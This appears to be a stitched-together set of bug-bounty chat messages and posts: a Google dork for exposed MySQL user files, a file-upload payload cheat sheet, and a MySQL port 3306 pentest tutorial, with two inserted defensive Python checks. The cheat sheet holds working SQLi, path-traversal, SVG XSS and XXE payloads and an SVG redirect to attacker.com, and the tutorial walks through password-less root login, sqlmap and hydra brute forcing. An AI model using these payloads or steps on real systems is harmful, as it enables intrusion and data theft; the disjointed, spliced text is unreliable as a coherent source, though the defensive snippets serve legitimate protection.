# Google Dork: "index of" "user.MYD"
# Title: Disclosure of sensitive files.
# Date: 15/08/2020
# Author: Sahil Saxena
# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174
# Twitter: https://twitter.com/Sahil_delinitor
# GitHub: https://github.com/Sahil-69
# Bugcrowd: https://bugcrowd.com/Prickn
Thanks,
Sahil Saxena
What do you even need them for? There are sites with subscriptions to batches of socks.. or get them yourself with those same exploits )
Hello everyone, this is a new information gathering bot, where you get all the information via email, phone number, username and more. Please do check and give feedback.
@Cipherinfo_bot
Thanks, but the Genymotion I'm seeing is a paid version and the free one is hard to set up on my PC
Hello, please, does anyone know how to proxy a mobile by its Wi-Fi hotspot through Burp Suite?
Hey everyone, does anyone have premium-rate phone numbers? If so, may I kindly ask you to DM me?
👋 Hello,
While checking my target, I saw a URL ending with config-apim.json.
It contains a client Id, clientlibrary and login.window.net.
What do you think?
https://medium.com/bugbountywriteup/my-hunt-discovering-microsoft-bugs-f6a9c790bec0
When downloading you have to select the option that says personal use
Genymotion is free
Let me explain it in more detail: I'm trying to proxy my phone through Burp Suite and I can't 'cause I don't have Wi-Fi. Instead I'm using my phone's Wi-Fi hotspot.
🖥Chaining Vulnerabilities through File Upload🖥
SQLi⏳
'sleep(20).jpg
sleep(25)-- -.jpg
../../etc/passwd/logo.png
../../../logo.png
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1">
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
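A server-side check for the filename and SVG cases listed in the post above, as an added example that is not part of the original post. The function names, the filename allowlist, the extension set and the list of active tags are assumptions chosen for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Assumed allowlist: short names of letters, digits, dash, underscore plus one known extension.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(?:png|jpg|jpeg|gif|svg)")
# Assumed set of elements that can run or embed active content inside an SVG.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "object", "embed"}


def filename_problem(name):
    """Return a reason string if the client-supplied filename is unsafe, else None."""
    if "/" in name or "\\" in name or ".." in name:
        return "path component in filename"
    if not SAFE_NAME.fullmatch(name):
        return "characters outside the allowlist"
    return None


def local(name):
    """Strip an XML namespace like '{ns}tag' and lowercase the rest."""
    return name.rsplit("}", 1)[-1].lower()


def svg_problem(data):
    """Return a reason string if the SVG bytes carry active content, else None."""
    # Refuse DTDs before parsing, so entity declarations are never processed.
    if re.search(rb"<!(DOCTYPE|ENTITY)", data, re.IGNORECASE):
        return "DTD or entity declaration"
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return "not well-formed XML"
    if local(root.tag) != "svg":
        return "root element is not svg"
    for el in root.iter():
        if local(el.tag) in ACTIVE_TAGS:
            return "active element <%s>" % local(el.tag)
        for attr, value in el.attrib.items():
            if local(attr).startswith("on"):
                return "event handler attribute %s" % local(attr)
            if local(attr) == "href" and value.strip().lower().startswith("javascript:"):
                return "javascript: URL"
    return None
```

Rejecting the upload is only one layer: storing files under a server-generated name and serving them with a fixed Content-Type and `X-Content-Type-Options: nosniff` covers the GIF-header case, which this check does not inspect.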
Penetration Testing on MySQL Port 3306
MySQL is a popular open-source relational database management system (RDBMS) that is widely used in web applications. As a penetration tester, it's essential to identify vulnerabilities in MySQL to prevent unauthorized access to sensitive data. In this article, we'll explore how to conduct a penetration test on MySQL Port 3306.
Initial Reconnaissance
Before we begin, let's perform some initial reconnaissance to gather information about the target system. We can use tools like Nmap to scan the target IP address and identify open ports.
nmap -sT 192.168.1.100
The output should reveal that port 3306 is open, indicating that MySQL is running on the target system.
MySQL Version Scanning
Next, we'll use Nmap to scan the MySQL version. We can use the -sV option to enable version detection.
nmap -sV 192.168.1.100 -p 3306
The output should display the MySQL version, which can help us identify potential vulnerabilities.
Authentication Bypass
Now, let's try to bypass authentication using the mysql command. We can use the -h option to specify the target IP address and the -u option to specify the username.
mysql -h 192.168.1.100 -u root
If the password is not set or is weak, we might be able to gain access to the MySQL database without authentication.
SQL Injection
SQL injection is a common vulnerability in web applications that use MySQL. We can use tools like SQLMap to identify SQL injection vulnerabilities.
sqlmap -u "http://192.168.1.100/vulnerable.php?id=1" --dbms=mysql
SQLMap will attempt to inject SQL code to extract sensitive data from the database.
Brute Force Attack
If we're unable to bypass authentication or find an SQL injection vulnerability, we can try a brute force attack using tools like Hydra.
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.100 mysql
Hydra will attempt to guess the password using a dictionary attack.
Conclusion
I've demonstrated how to conduct a penetration test on MySQL Port 3306. We've shown how to perform initial reconnaissance, scan the MySQL version, bypass authentication, identify SQL injection vulnerabilities, and launch a brute force attack. Remember to always conduct penetration tests with permission from the system owner and to follow applicable laws and regulations.
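On the defending side, the password-less root login and the dictionary attack described above both show up as "Access denied" entries when the MySQL server writes rejected logins to its error log. The following is an added example, not part of the original post, that flags both patterns; it assumes that logging is enabled and uses this line format, and the sample lines, thresholds and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches MySQL error-log entries for rejected logins.
DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})\.\d+Z .*"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)' "
    r"\(using password: (?P<pw>YES|NO)\)"
)

# Constructed sample log (not captured from a real server).
_LINE = "2024-05-01T12:00:%02d.000000Z %d [Note] Access denied for user '%s'@'%s' (using password: %s)"
SAMPLE = [_LINE % (s, 20 + s, "root", "192.168.1.50", "YES") for s in range(6)] + [
    _LINE % (30, 40, "root", "192.168.1.77", "NO"),
    "2024-05-01T12:01:00.000000Z 0 [Note] Event Scheduler: Loaded 0 events",
]


def denials(lines):
    """Yield (timestamp, user, host, used_password) for each rejected login."""
    for line in lines:
        m = DENIED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
            yield ts, m["user"], m["host"], m["pw"] == "YES"


def brute_force_sources(lines, threshold=5, window=timedelta(seconds=60)):
    """Map each source host to its peak denial count in any window, if >= threshold."""
    by_host = defaultdict(list)
    for ts, _user, host, _pw in denials(lines):
        by_host[host].append(ts)
    peaks = {}
    for host, stamps in by_host.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            # Slide the window start forward until it covers at most `window`.
            while ts - stamps[start] > window:
                start += 1
            peaks[host] = max(peaks.get(host, 0), end - start + 1)
    return {host: n for host, n in peaks.items() if n >= threshold}


def passwordless_attempts(lines):
    """Return sorted (user, host) pairs that tried to log in without a password."""
    return sorted({(u, h) for _ts, u, h, used_pw in denials(lines) if not used_pw})
```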